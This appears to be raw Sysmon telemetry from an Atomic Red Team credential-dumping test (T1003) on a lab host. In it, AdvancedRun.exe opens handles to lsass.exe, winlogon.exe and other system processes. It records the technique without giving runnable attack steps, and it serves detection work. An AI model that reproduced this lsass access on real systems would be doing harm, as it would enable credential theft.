17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003980089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003980088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003980085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003980084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 